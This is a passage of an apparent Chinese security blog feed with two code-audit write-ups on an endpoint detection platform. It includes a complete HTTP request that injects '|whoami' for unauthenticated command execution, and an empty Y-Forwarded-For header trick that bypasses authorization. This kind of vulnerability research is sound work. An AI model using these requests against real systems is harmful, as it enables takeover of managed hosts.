                    \u800c\u540e\u901a\u8fc7\u51fd\u6570 get_opr<\/code> \u5f97\u5230\u4e86 exec_slog_action<\/code>\uff0c\u518d\u6839\u636e exec_slog_action<\/code> \u83b7\u5f97\u4e86\u5177\u4f53\u4ee3\u7801\u8def\u5f84 app.web.device_linkage.process_cssp<\/code>\uff0c\u6700\u540e\u6839\u636e opr<\/code>\u3001app_name<\/code> \u4ee5\u53ca data<\/code>\uff08 \u8fd9\u91cc\u7684data\u9700\u4e3aPOST\u8bf7\u6c42\u65b9\u5f0f\u65f6\u624d\u6709 \uff09\u6784\u9020\u6570\u7ec4\u8fd4\u56de\uff0c\u8fd9\u91cc\u6d4b\u8bd5\u5c31\u662fGET\u8bf7\u6c42\uff0c\u6700\u540e\u8fd4\u56de\u6570\u636e\u4e3a\uff1a<\/p>\n\n
                    array(2) {\n  [\"app_args\"]=>\n  array(1) {\n    [\"name\"]=>\n    string(35) \"app.web.device_linkage.process_cssp\"\n  }\n  [\"opr\"]=>\n  string(16) \"exec_slog_action\"\n}\n<\/code><\/pre>\n\n
                    \u53d8\u91cf $interface_data<\/code> \u83b7\u53d6\u4e86\u51fd\u6570 get_interface_data<\/code> \u7684\u8fd4\u56de\u503c\uff0c\u7531\u4e8eldb_execute_app<\/code> \u51fd\u6570\u4ee3\u7801\u5f88\u591a\uff0c\u4e0d\u8fc7\u591a\u8d58\u8ff0\uff0c\u6709\u51e0\u5904\u6388\u6743\u6821\u9a8c\u7684\u51fd\u6570\uff0c\u7b80\u5355\u8ddf\u8e2a\u4e0b\u770b\u4e0b\u6ce8\u91ca\u5c31\u80fd\u4e86\u89e3CSSP\u8bf7\u6c42\u4e0d\u5904\u7406\u6388\u6743\uff1a<\/p>\n\n
                    \"-w855\"<\/p>\n\n
                    \"-w665\"<\/p>\n\n
                    \u56de\u8c03\u8c03\u7528 app.web.device_linkage.process_cssp<\/code> \u7684\u51fd\u6570 main<\/code> \u4f20\u5165\u53d8\u91cf $instance<\/code>\u3001$interface_data<\/code>\uff08 \u51fd\u6570 get_interface_data<\/code> \u7684\u8fd4\u56de\u503c \uff09\uff0c\u90a3\u6211\u4eec\u8ddf\u8fdb main<\/code> \u51fd\u6570\uff0c\u53c8\u662f\u56de\u8c03\u51fd\u6570\u8c03\u7528 exec_slog_action<\/code> \u5e76\u4f20\u5165\u53d8\u91cf $object<\/code>\u3001$params<\/code> \uff08 \u51fd\u6570 get_interface_data<\/code> \u7684\u8fd4\u56de\u503c \uff09\u3002<\/p>\n\n
                    \"-w542\"<\/p>\n\n
                    \u8fd9\u6837\u65e0\u6cd5\u9020\u6210\u547d\u4ee4\u6267\u884c\uff0c\u6211\u4eec\u5728\u4e4b\u524d exec_slog_action \u533f\u540d\u51fd\u6570\u5206\u6790<\/code> \u4e2d\u4e86\u89e3\u5230\u5176\u8981\u83b7\u53d6 $params['data']['params']<\/code> \u5e26\u5165\u547d\u4ee4\u6267\u884c\u8bed\u53e5\u4e2d\uff0c\u7531\u4e8e\u6211\u4eec\u6d4b\u8bd5\u7684\u662fGET\u8bf7\u6c42\uff0c\u51fd\u6570 get_interface_data<\/code> \u7684\u8fd4\u56de\u503c\u5e76\u6ca1\u6709 data['params']<\/code> \u8fd9\u4e2akey\uff0c\u800c\u521a\u597d\u51fd\u6570 get_interface_data<\/code> \u4e2d\u7684\u53d8\u91cf $interface_data[\"data\"]<\/code> \u4f1a\u83b7\u53d6\u51fd\u6570 get_body_data<\/code> \u5904\u7406\u8bf7\u6c42\u6b63\u6587\u7684JSON\u5185\u5bb9\u8f6c\u4e3a\u6570\u7ec4\u7684\u7ed3\u679c\uff0c\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u8bf7\u6c42\u65b9\u6cd5\u4e3aPOST\uff0c\u8bf7\u6c42\u6b63\u6587\u4e3a\uff1a{\"params\":\"|whoami\"}<\/code>\uff0c\u5373\u53ef\u8fdb\u884c\u547d\u4ee4\u6ce8\u5165\u4ece\u800c\u6267\u884c\u3002<\/p>\n\n
                    \/\/ {\"params\":\"|whoami\"}` -> array('params' => '|whoami')\n$interface_data[\"data\"] = array('params' => '|whoami');\n<\/code><\/pre>\n\n
                    \"-w1278\"<\/p>\n\n
                    POST \/api\/edr\/sangforinter\/v2\/cssp\/slog_client?token=eyJyYW5kb20iOiIxIiwgIm1kNSI6ImM0Y2E0MjM4YTBiOTIzODIwZGNjNTA5YTZmNzU4NDliIn0= HTTP\/1.1\nHost: 192.168.31.136\nConnection: close\nContent-Length: 20\nAccept: application\/json, text\/plain, *\/*\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.135 Safari\/537.36\nContent-Type: application\/x-www-form-urlencoded\nOrigin: https:\/\/192.168.31.136\nReferer: https:\/\/192.168.31.136\/ui\/login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\"params\":\"|whoami\"}\n<\/code><\/pre>\n\n
                    \u6700\u540e<\/h2>\n\n
                    \u719f\u6089\u4e86\u89e3\u4e86\u6574\u4e2a\u6d41\u7a0b\u4e4b\u540e\uff0c\u5176\u5b9e\u8fd8\u6709\u66f4\u591a\u5229\u7528\u70b9\u53ef\u4ee5\u6316\u6398\uff5e\u672c\u6587\u5c31\u4e0d\u8fc7\u591a\u7684\u8d58\u8ff0\u4e86\u3002<\/p>\n","pubDate":"2020-09-03T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2020-09-03\/4","guid":"https:\/\/gh0st.cn\/archives\/2020-09-03\/4"},{"title":"\u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u5ba1\u8ba1\u6316\u6398\uff08\u6743\u9650\u7ed5\u8fc7\uff09","description":"
                    \u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u5ba1\u8ba1\u6316\u6398\uff08\u6743\u9650\u7ed5\u8fc7\uff09<\/h1>\n\n
                    \u524d\u8a00<\/h2>\n\n
                    \u524d\u51e0\u5929\u6536\u5230\u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u672a\u6388\u6743RCE\u7684\u6f0f\u6d1e\u60c5\u62a5\uff0c\u57fa\u672c\u4e0a\u88ab\u5e08\u5085\u4eec\u73a9\u7684\u5dee\u4e0d\u591a\u4e86\uff0c\u57fa\u4e8e\u5176\u4ed6\u793e\u7fa4\u4f20\u51fa\u7684\u6e90\u4ee3\u7801\u8fdb\u884c\u4ee3\u7801\u5ba1\u8ba1\u6316\u6398\u3002<\/p>\n\n
                    \u672c\u6587\u4e0d\u4f1a\u5bf9\u592a\u591a\u7ec6\u8282\u8fdb\u884c\u63cf\u8ff0\uff0c\u4ec5\u505a\u4e00\u4e2a\u6d41\u7a0b\u5206\u6790\u548c\u68b3\u7406\uff0c\u6587\u4e2d\u82e5\u6709\u4e0d\u5f53\u4e4b\u5904\u8fd8\u671b\u5404\u4f4d\u5e08\u5085\u65a7\u6b63\u3002<\/p>\n\n
                    \u5ba1\u8ba1\u6d41\u7a0b<\/h2>\n\n
                    \u5176\u6e90\u4ee3\u7801\u7684\u5927\u81f4\u76ee\u5f55\u5982\u4e0b\uff1a<\/p>\n\n
                    .\n\u251c\u2500\u2500 cascade\n\u251c\u2500\u2500 dbint64_to_array.php\n\u251c\u2500\u2500 dbstr_to_int64.php\n\u251c\u2500\u2500 diskio\n\u251c\u2500\u2500 get_auth.php\n\u251c\u2500\u2500 heart_aware.php\n\u251c\u2500\u2500 kill.exe\n\u251c\u2500\u2500 lang\n\u251c\u2500\u2500 ldb\n\u251c\u2500\u2500 ldb.js\n\u251c\u2500\u2500 ldb_collect.php\n\u251c\u2500\u2500 ldb_daemon.php\n\u251c\u2500\u2500 ldb_manage.php\n\u251c\u2500\u2500 ldb_mapreduce.php\n\u251c\u2500\u2500 ldb_master.php\n\u251c\u2500\u2500 ldb_rest.php\n\u251c\u2500\u2500 ldb_rfs.php\n\u251c\u2500\u2500 ldb_stream.php\n\u251c\u2500\u2500 license\n\u251c\u2500\u2500 link_log_second_convert.php\n\u251c\u2500\u2500 locks\n\u251c\u2500\u2500 manage\n\u251c\u2500\u2500 mapreduce\n\u251c\u2500\u2500 mdb\n\u251c\u2500\u2500 mdb.ini\n\u251c\u2500\u2500 mdb_console.php\n\u251c\u2500\u2500 mdb_server.php\n\u251c\u2500\u2500 misc\n\u251c\u2500\u2500 modify_detect_engine_config.php\n\u251c\u2500\u2500 mongo\n\u251c\u2500\u2500 mongo.exe\n\u251c\u2500\u2500 mongo_config\n\u251c\u2500\u2500 mongod\n\u251c\u2500\u2500 mongodump\n\u251c\u2500\u2500 mongoexport\n\u251c\u2500\u2500 mongoexport.exe\n\u251c\u2500\u2500 mongoimport\n\u251c\u2500\u2500 mongoimport.exe\n\u251c\u2500\u2500 mongorestore\n\u251c\u2500\u2500 netshare.bat\n\u251c\u2500\u2500 patch_upgrade_ipc.php\n\u251c\u2500\u2500 php-fpm-start.sh\n\u251c\u2500\u2500 php-trace\n\u251c\u2500\u2500 phptrace\n\u251c\u2500\u2500 platform\n\u251c\u2500\u2500 start.php\n\u251c\u2500\u2500 start.sh\n\u251c\u2500\u2500 start_mongo.sh\n\u251c\u2500\u2500 start_mongo_for_log.sh\n\u251c\u2500\u2500 sync_execute.php\n\u251c\u2500\u2500 timing_update.php\n\u251c\u2500\u2500 unzip\n\u251c\u2500\u2500 update_virusandavscan.php\n\u251c\u2500\u2500 web\n\u2514\u2500\u2500 zip\n\n<\/code><\/pre>\n\n
                    \u5176\u4e2d\/web<\/code>\u4e3aWeb\u670d\u52a1\u76ee\u5f55\uff0c\u6587\u4ef6\u5747\u53ef\u901a\u8fc7HTTP\u670d\u52a1<\/code>\u8fdb\u884c\u8bbf\u95ee\uff0c\u987e\u6211\u4eec\u4ece\u8be5\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\u4e0b\u624b\u5ba1\u8ba1\u3002<\/p>\n\n
                    ldb_mapreduce_invoke \u51fd\u6570\u5206\u6790<\/h3>\n\n
                    \u4e0d\u662f\u4e00\u628a\u68ad\u76840day\u90fd\u4e0d\u53eb0day\uff0c\u5bfb\u627e\u80fd\u52fe\u8d77\u5174\u8da3\u7684\u6587\u4ef6\uff0c\u53d1\u73b0\u4e86\u5b83\uff08\u6587\u4ef6\u540d\u5e26\u6709upload<\/code>\uff09\/bin\/web\/divideUploader.php<\/code>\uff1a<\/p>\n\n
                    if($_SERVER['REQUEST_METHOD']==\"POST\"){\n    \/\/\u8d85\u65f6\u5f00\u5173\u6253\u5f00\uff0c\u540e\u53f0\u767b\u5f55\u65f6\u95f4\u4e0d\u5237\u65b0\n    $update = (isset($_POST['auto']) && $_POST['auto'] == AUTO_FLASH_SWITCH) ? false : true;\n    ldb_mapreduce_invoke('call_method','util.common.auth', 'app_auth_check', $update);\n    ...\n}\n<\/code><\/pre>\n\n
                    \u8bbf\u95ee\u6ca1\u6709\u505a\u9650\u5236\uff0c\u53ea\u8981HTTP\u8bf7\u6c42\u7c7b\u578b\u4e3aPOST<\/code>\u5c31\u8fdb\u5165\u4e0a\u4f20\u529f\u80fd\u4ee3\u7801\u903b\u8f91\u6d41\u7a0b\uff0c\u4e09\u5143\u8fd0\u7b97\u5f88\u7b80\u5355\u4e0d\u7528\u770b\uff0c\u6211\u4eec\u6765\u770b\u4e0b\u8fd9\u6bb5\u4ee3\u7801\uff1a<\/p>\n\n
                    ldb_mapreduce_invoke('call_method','util.common.auth', 'app_auth_check', $update);\n<\/code><\/pre>\n\n
                    \u8ddf\u8fdb\u51fd\u6570\uff1aldb_mapreduce_invoke<\/code>\uff0c\u6587\u4ef6\uff1a\/bin\/mapreduce\/core.php<\/code>\uff08line 19<\/em>\uff09\uff1a<\/p>\n\n
                    \/*\n * \u5168\u5c40\u7684mapreduce\u5bf9\u8c61\uff0c\u63d0\u4f9b\u6240\u6709map\/reduce\u5de5\u4f5c\u5668\u4ef6\u7684\u6ce8\u518c\u548c\u83b7\u53d6\u63a5\u53e3\n *\/\n$ldb_mapreduce = (object)array();\n\n\/*\n * \u8c03\u7528mapduce\u63a5\u53e3\uff0c\u53d8\u53c2\n * @return mix \u8fd4\u56de\u8c03\u7528\u63a5\u53e3\u7684\u8fd4\u56de\u503c\n *\/\nfunction ldb_mapreduce_invoke() {\n    global $ldb_mapreduce;\n    \n    $params = func_get_args();\n    if (!count($params)) {  \n        return false;\n    } \/\/\u5224\u65ad\u53c2\u6570\u4e2a\u6570\uff0c\u5982\u679c\u4e3a0\u5219return false;\n    $func = $params[0];\n    if (!property_exists($ldb_mapreduce, $func)) {\n        return false;\n    }\n    $params[0] = $ldb_mapreduce;\n    return call_user_func($ldb_mapreduce->$func, $params);\n}\n<\/code><\/pre>\n\n
                    \u63a5\u6536\u81ea\u5b9a\u4e49\u53c2\u6570\u5217\u8868\uff1a$params = func_get_args();<\/code>\uff08 \u8be5\u51fd\u6570\u4ee5\u6570\u7ec4\u5f62\u5f0f\u8fd4\u56de\uff0c\u83b7\u53d6\u5f53\u524d\u51fd\u6570\u7684\u6240\u6709\u4f20\u5165\u53c2\u6570\u503c \uff09\uff0c\u5728\u8fd9\u5c31\u662farray('call_method','util.common.auth', 'app_auth_check', $update)<\/code><\/p>\n\n
                    \u8d4b\u503c\uff08 $params[0] = 'call_method'<\/code> \uff09 $func<\/code>\uff0c\u68c0\u67e5 $func<\/code> \u5c5e\u6027\u662f\u5426\u5b58\u5728\u4e8e\u6307\u5b9a\u7684\u7c7b\uff08 $ldb_mapreduce<\/code> \uff09\u4e2d\uff1a<\/p>\n\n
                    $func = $params[0];\nif (!property_exists($ldb_mapreduce, $func)) {\n    return false;\n}\n<\/code><\/pre>\n\n
                    \u6700\u540ecall_user_func<\/code>\u51fd\u6570\u56de\u8c03\uff0c\u8c03\u7528$ldb_mapreduce->call_method<\/code>\u65b9\u6cd5\uff0c\u7ee7\u7eed\u8ddf\u8fdb\u6b64\u65b9\u6cd5\uff08 line 239<\/em> \uff09\uff1a<\/p>\n\n
                    $ldb_mapreduce->call_method = function ($params) {\n    if (count($params) < 3) {\n        return false;\n    }\n    $object = array_shift($params);\n    $id     = array_shift($params);\n    $method = array_shift($params);\n    $object = call_user_func($object->get, array($object, $id));\n    if (!is_object($object) \n        || !property_exists($object, $method)\n        || !is_callable($object->$method)) {\n        return false;\n    }\n    return call_user_func_array($object->$method, $params);\n};\n<\/code><\/pre>\n\n
                    \u7b80\u5355\u7406\u89e3\uff0c\u8fd9\u662f\u4e00\u4e2a\u533f\u540d\u51fd\u6570\uff0c\u5f62\u53c2 $params<\/code>\uff08 \u5728\u8fd9\u91cc\u4e5f\u5c31\u8868\u793aarray($ldb_mapreduce, 'util.common.auth', 'app_auth_check', $update)<\/code> \uff09\uff0c\u5224\u65ad $params<\/code> \u6570\u7ec4\u957f\u5ea6\u662f\u5426\u5c0f\u4e8e3<\/code>\uff0c\u5728\u8fd9\u91cc\u660e\u663e\u4e0d\u5c0f\u4e8e\uff0c\u6240\u4ee5\u7ee7\u7eed\u8ddf\u8fdb\u8d4b\u503c\u53d8\u91cf\uff0c\u5176\u4e00\u4e00\u5bf9\u5e94\u5185\u5bb9\u4e3a\uff1a<\/p>\n\n
                    $object = array_shift($params); \/\/ -> $ldb_mapreduce\n$id     = array_shift($params); \/\/ -> util.common.auth\n$method = array_shift($params); \/\/ -> app_auth_check\n<\/code><\/pre>\n\n
                    \u8d4b\u503c\u5b8c\u6210\u4e4b\u540e\u8fdb\u5165\u56de\u8c03\u51fd\u6570\uff1a$object = call_user_func($object->get, array($object, $id));<\/code>\uff0c\u8c03\u7528$ldb_mapreduce->get<\/code>\u4f20\u5165array($object, $id))<\/code>\uff0c\u63a5\u4e0b\u6765\u7ee7\u7eed\u8ddf\u8fdb$ldb_mapreduce->get<\/code>\uff1a<\/p>\n\n
                    \/*\n * \u83b7\u53d6\u7ec4\u4ef6\n * @param array $params \u53c2\u6570\u6570\u7ec4\uff0carray(\u5bf9\u8c61, \u540d\u79f0)\n * @return callable \u8fd4\u56de\u7ec4\u4ef6\u6784\u9020\u5668\uff0c\u5982\u679c\u6ca1\u6709\u6784\u9020\u5668\u8fd4\u56denull\n *\/\n$ldb_mapreduce->get = function ($params) use(&$store_root) {\n\/\/ldb_info(\"get params: \".json_encode($params));\n    list($object, $id) = $params;\n    if (!strstr($id, \"@\")) {\n        $id = \"$id@ldb\";\n    }\n    $fields = preg_split(\"\/[\\.\\\\\\\\\\\\\/]+\/\", $id);\n    if (!count($fields)) {\n        return null;\n    }\n    $component = $fields[0];\n    \/\/ldb_info(\"$component\");\n    $id = implode(\"\/\", $fields);\n    list($path, $base) = explode(\"@\", $id);\n    if (!property_exists($object, $component) \n        || !array_key_exists($id, $object->$component)) {\n        if ($base == \"ldb\") {\n            $php = dirname(__FILE__).\"\/$path.php\";\n        } else {\n            $php = \"$store_root\/$base\/bin\/$path.php\";\n        }\n        if (!file_exists($php)) {\n            return null;\n        }\n        if (!class_exists(\"Error\")) {\n            require_once($php);    \n        } else {\n            try {\n                require_once($php);\n            } catch (Error $e) {\n                ldb_die($e);\n            }\n        }\n    \/\/ldb_info(\"id: \".$id.\",component: \".$object->$component);\n        if (!array_key_exists($id, $object->$component)) {\n            ldb_info(\"! array_key_exists\");\n            return null;\n        }\n    }\n    $components = $object->$component;\n    return $components[$id];\n};\n<\/code><\/pre>\n\n
                    \u7531\u4e8e\u4ee3\u7801\u8fc7\u957f\uff0c\u5f88\u591a\u53ef\u4ee5\u76f4\u63a5\u5728\u672c\u5730\u8c03\u8bd5\u8f93\u51fa\uff0c\u5927\u6982\u89e3\u91ca\u4e0b\u8fd9\u91cc\u7684\u610f\u601d\uff0c\u5c31\u662f\u5c06$id = 'util.common.auth';<\/code>\u5904\u7406\u53d8\u6210\u8def\u5f84$php = dirname(__FILE__).\"\/$path.php\";<\/code>\uff0c\u7ed3\u679c\u5c31\u662f\/bin\/mapreduce\/util\/common\/auth.php<\/code><\/p>\n\n
                    \"-w1170\"<\/p>\n\n
                    \u63a5\u7740require_once\uff08 \u5305\u542b \uff09<\/strong>\u8fd9\u4e2a\u6587\u4ef6\uff0c\u6700\u540e\u5c06auth.php<\/code>\u6587\u4ef6\u516c\u5f00\u7684\u6ce8\u518c\u63a5\u53e3\u8fd4\u56de\uff1a<\/p>\n\n
                    \"-w712\"<\/p>\n\n
                    \u81f3\u6b64\uff0c\u6211\u4eec\u5bf9ldb_mapreduce_invoke<\/code>\u51fd\u6570\u7684\u5206\u6790\u5c31\u5dee\u4e0d\u591a\u4e86\uff0c\u6700\u540e\u53c8\u662f\u4e00\u4e2acall_user_func<\/code>\u56de\u8c03\u51fd\u6570\u8c03\u7528auth.php<\/code>\u63a5\u53e3app_auth_check<\/code>\uff1a<\/p>\n\n
                    return call_user_func_array($func, $params);\n<\/code><\/pre>\n\n
                    app_auth_check \u51fd\u6570\u5206\u6790<\/h3>\n\n
                    app_auth_check<\/code>\u51fd\u6570\u5c31\u662f\u68c0\u6d4b\u5f53\u524d\u662f\u5426\u5177\u5907\u8bbf\u95ee\u63a5\u53e3\u6743\u9650\u4e0b\uff0c\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n
                    $app_auth_check = function ($update=true) use(&$login_authed_check,\n                                        &$sess_keyvalue_get,\n                                        &$timeout_check,\n                                        &$dc_session_destroy,\n                                        &$login_redirect,\n                                        &$super_ip_check){\n    \/\/ \u81ea\u52a8\u5316\u653e\u5f00\u6743\u9650\u68c0\u67e5\n    if (ldb_auto_check()) {\n        return true;\n    }\n    \/\/ \u5982\u679c\u662f\u540e\u53f0\u8c03\u7528app\uff0c\u5219\u4e0d\u8fdb\u884c\u6743\u9650\u68c0\u67e5\n    if (ldb_is_cli()) {\n        return true;\n    }\n    \/\/\u5982\u679c\u662f\u901a\u8fc7\u7279\u6743IP\u767b\u9646\uff0c\u5219\u4e0d\u9700\u8981\u8fdb\u884c\u6743\u9650\u68c0\u67e5\n    $is_super_ip = call_user_func($super_ip_check);\n    if($is_super_ip){\n        return true;\n    }\n\n    call_user_func($timeout_check, $update);\n\n    \/\/ \u68c0\u6d4b\u662f\u5426\u767b\u5f55\n    $login = call_user_func($login_authed_check);\n    if ($login == false) {\n        call_user_func($login_redirect);\n        return false;\n    }\n    \/\/ \u8fdb\u884c\u63a7\u5236\u53f0\u767b\u9646\u8d85\u65f6\u68c0\u6d4b\n    \/*\n    \/\/ app\u6743\u9650\u68c0\u6d4b\n    $user_auth_info = call_user_func($sess_keyvalue_get, \"auth_page_info\");\n    \/\/ \u68c0\u67e5\u6388\u6743\n    if (isset($user_auth_info[\"$page_id\"][\"auth\"])) {\n        $auth = $user_auth_info[\"$page_id\"][\"auth\"];\n        if ($auth === true) {\n            return true;\n        }\n    }\n    return false;\n    *\/\n    return true;\n};\n<\/code><\/pre>\n\n
                    \u9010\u4e2a\u903b\u8f91\u8ddf\u8fdb\u5206\u6790\u5373\u53ef\uff0c\u6700\u540e\u53d1\u73b0\u7279\u6743IP\u767b\u9646\u7684\u5224\u65ad\u6709\u95ee\u9898\uff1a<\/p>\n\n
                    $is_super_ip = call_user_func($super_ip_check);\n    if($is_super_ip){\n        return true;\n    }\n<\/code><\/pre>\n\n
                    \u8ddf\u8fdb\u51fd\u6570super_ip_check<\/code>\uff0c\u53d1\u73b0\u8fd9\u91cc\u83b7\u53d6\u7684\u4e86HTTP\u8bf7\u6c42\u5934\uff08$_SERVER[\"HTTP_Y_FORWARDED_FOR\"] = Y-Forwarded-For<\/code>\uff09\u4e0e$super_ip<\/code>\u8fdb\u884c\u5224\u65ad\uff1a<\/p>\n\n
                    $super_ip_check = function() use(&$get_super_ip, &$super_user_check){\n    $super_ip = call_user_func($get_super_ip);\n    $user_addr = $_SERVER[\"HTTP_Y_FORWARDED_FOR\"];\n    if($user_addr == $super_ip){\n        return true;\n    }\n    else{\n        return call_user_func($super_user_check);\n    }\n};\n<\/code><\/pre>\n\n
                    \u9605\u8bfb\u4ee5\u4e0a\u4ee3\u7801\u77e5\u9053$super_ip<\/code>\u662f\u901a\u8fc7\u56de\u8c03\u51fd\u6570\u8c03\u7528get_super_ip<\/code>\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u8fd8\u9700\u8981\u518d\u8ddf\u8fdbget_super_ip<\/code>\u51fd\u6570\uff1a<\/p>\n\n
                    $get_super_ip = function(){\n    $super_ip_config = ldb_ext_root().\"..\/..\/dc\/config\/cssp_super_ip.ini\";\n    $super_ip = \"\";\n    if(file_exists($super_ip_config)){\n        $super_config_data = parse_ini_file($super_ip_config, true);\n        $super_ip = isset($super_config_data[\"config\"][\"super_ip\"]) ? $super_config_data[\"config\"][\"super_ip\"] : \"\";\n    }\n    \n    return $super_ip;\n};\n<\/code><\/pre>\n\n
                    \u5728\u8fd9\u6bb5\u4ee3\u7801\u4e2d\u6211\u4eec\u5f97\u77e5\u5176\u9700\u8981\u83b7\u53d6cssp_super_ip.ini<\/code>\u6587\u4ef6\u7684\u5185\u5bb9\u8d4b\u503c\u53d8\u91cf$super_ip<\/code>\u518d\u8fdb\u884creturn $super_ip<\/code>\uff0c\u4f46\u9ed8\u8ba4\u73af\u5883\u4e0b\u8be5\u6587\u4ef6\u4e0d\u5b58\u5728\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u53d8\u91cf$super_ip<\/code>\u9ed8\u8ba4\u5c31\u662f\u7a7a\u7684\u3002<\/p>\n\n
                    \u90a3\u4e48\u6211\u4eec\u53ea\u9700\u8981\u6ee1\u8db3$user_addr == $super_ip<\/code>\u8fd9\u4e2a\u6761\u4ef6\uff0c\u5373\u53ef\u7ed5\u8fc7\u8fd9\u4e2a\u51fd\u6570\uff08\u6743\u9650\uff09\u68c0\u6d4b\uff0c\u7b80\u800c\u8a00\u4e4b\u5c31\u662f\u8bf7\u6c42\u63a5\u53e3\u65f6\u5e26\u6709\u8bf7\u6c42\u5934Y-Forwarded-For:<\/code>\u5373\u53ef\u3002<\/p>\n\n
                    \u6f0f\u6d1e\u5229\u7528<\/h2>\n\n
                    \u7ee7\u7eed\u8ddf\u8fdbdivideUploader.php<\/code>\u53d1\u73b0\u6ca1\u529e\u6cd5\u76f4\u63a5\u5229\u7528\uff08\u9650\u5236\u4e86\u4e0a\u4f20\u8def\u5f84\u548c\u540e\u7f00\uff09\uff1a<\/p>\n\n
                    \"-w557\"<\/p>\n\n
                    \u53ea\u80fd\u4e0a\u4f20\u6307\u5b9a\u540e\u7f00\u5230\u6307\u5b9a\u76ee\u5f55\uff1a<\/p>\n\n
                    \"-w304\"<\/p>\n\n
                    \u5168\u5c40\u641c\u7d22app_auth_check<\/code>\u51fd\u6570\u53d1\u73b0\/bin\/mapreduce\/<\/code>\u76ee\u5f55\u4e0b\u7684\u5f88\u591a\u63a5\u53e3\u90fd\u5728\u6700\u5f00\u59cb\u52a0\u4e86\u4e00\u5c42app_auth_check<\/code>\u51fd\u6570\u7528\u6765\u505a\u6743\u9650\u5224\u65ad\uff0c\u90a3\u4e48\u6211\u4eec\u8fd9\u65f6\u5019\u5c31\u5dee\u4e00\u4e2a\u63a5\u53e3\u8c03\u7528\u7684\u5165\u53e3\u5373\u53ef\u672a\u6388\u6743\u8c03\u7528\u6240\u6709\u63a5\u53e3\u4e86\u3002<\/p>\n\n
                    \u53ea\u80fd\u5728\/bin\/web<\/code>\u53ef\u76f4\u63a5\u8bbf\u95ee\u76ee\u5f55\u4e0b\u5bfb\u627e\uff0c\u53d1\u73b0\/bin\/web\/launch.php<\/code>\u6587\u4ef6\uff0c\u5176\u6587\u4ef6\u6ce8\u91ca\u5c31\u8868\u660e\u4e86\u8fd9\u4e2a\u6587\u4ef6\u662f\u5e94\u7528\u7a0b\u5e8f\u901a\u7528\u6267\u884c\u5165\u53e3\uff0c\u53ef\u4ee5\u901a\u8fc7\u5206\u6790\u7684\u65b9\u5f0f\u6784\u5efa\u8bf7\u6c42\uff08 \u7531\u4e8e\u5206\u6790\u903b\u8f91\u8f83\u7b80\u5355\u8fd9\u91cc\u5c31\u4e0d\u5e26\u5927\u5bb6\u8fc7\u4e00\u904d\u4e86\uff0c\u53ef\u4ee5\u81ea\u81ea\u884c\u5206\u6790 \uff09\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7\u524d\u53f0\u7684\u65b9\u5f0f\u76f4\u63a5\u6293\u5230\u8be5\u6587\u4ef6\u7684\u8bf7\u6c42\uff1a<\/p>\n\n
                    \"-w583\"<\/p>\n\n
                    POST\u8bf7\u6c42\u4f20\u9012JSON\u6570\u636e\uff1a<\/p>\n\n
                    {\"opr\":\"dlogin\",\"app_args\":{\"name\":\"app.web.auth.login\",\"options\":{}},\"data\":{\"key\":175643761}}\n<\/code><\/pre>\n\n
                    \u5176\u5bf9\u5e94\u5173\u7cfb\u5982\u4e0b<\/p>\n\n
                    app_args.name - \u5bf9\u5e94\u8c03\u7528\u7684\u63a5\u53e3\u6587\u4ef6\nopr - \u5bf9\u5e94\u8c03\u7528\u7684\u516c\u5171\u63a5\u53e3\u51fd\u6570\ndata - \u5bf9\u5e94\u516c\u5171\u63a5\u53e3\u51fd\u6570\u903b\u8f91\u6240\u9700\u7684\u53c2\u6570\n<\/code><\/pre>\n\n
                    \u8fd9\u91cc\u7b80\u5355\u7ffb\u4e86\u4e0b\/bin\/mapreduce\/<\/code>\u76ee\u5f55\u4e0b\u7684\u4e00\u4e9b\u63a5\u53e3\uff0c\u6839\u636e\u5176\u5224\u65ad\u903b\u8f91\u6784\u5efa\u8bf7\u6c42\u5305\uff0c\u8fd9\u91cc\u4ee5\u83b7\u53d6\u6240\u6709\u7ec8\u7aef\u5217\u8868\u4e3a\u4f8b\uff08 \u672a\u6388\u6743 \uff09\uff1a<\/p>\n\n
                    \u672a\u52a0Y-Forwarded-For<\/code>\u5934\u8bf7\u6c42\uff0c\u63d0\u793a\u9700\u8981\u767b\u9646\uff1a<\/p>\n\n
                    \"-w1038\"<\/p>\n\n
                    \u6dfb\u52a0\u540e\u6743\u9650\u7ed5\u8fc7\uff0c\u76f4\u63a5\u53ef\u4ee5\u83b7\u53d6\u6570\u636e\uff1a<\/p>\n\n
                    \"-w1276\"<\/p>\n\n
                    \u6700\u540e<\/h2>\n\n
                    \u6b64\u6f0f\u6d1e\u5371\u5bb3\u53ef\u4ee5\u591a\u63a5\u53e3\u642d\u914d\u672a\u6388\u6743\u4e0b\u53d1\u811a\u672c\uff0c\u63a7\u5236\u6240\u6709\u690d\u5165Agent\u7684\u670d\u52a1\u5668\u6743\u9650\uff0c\u5f71\u54cd\u7248\u672c\uff1a<3.2.21<\/p>\n\n
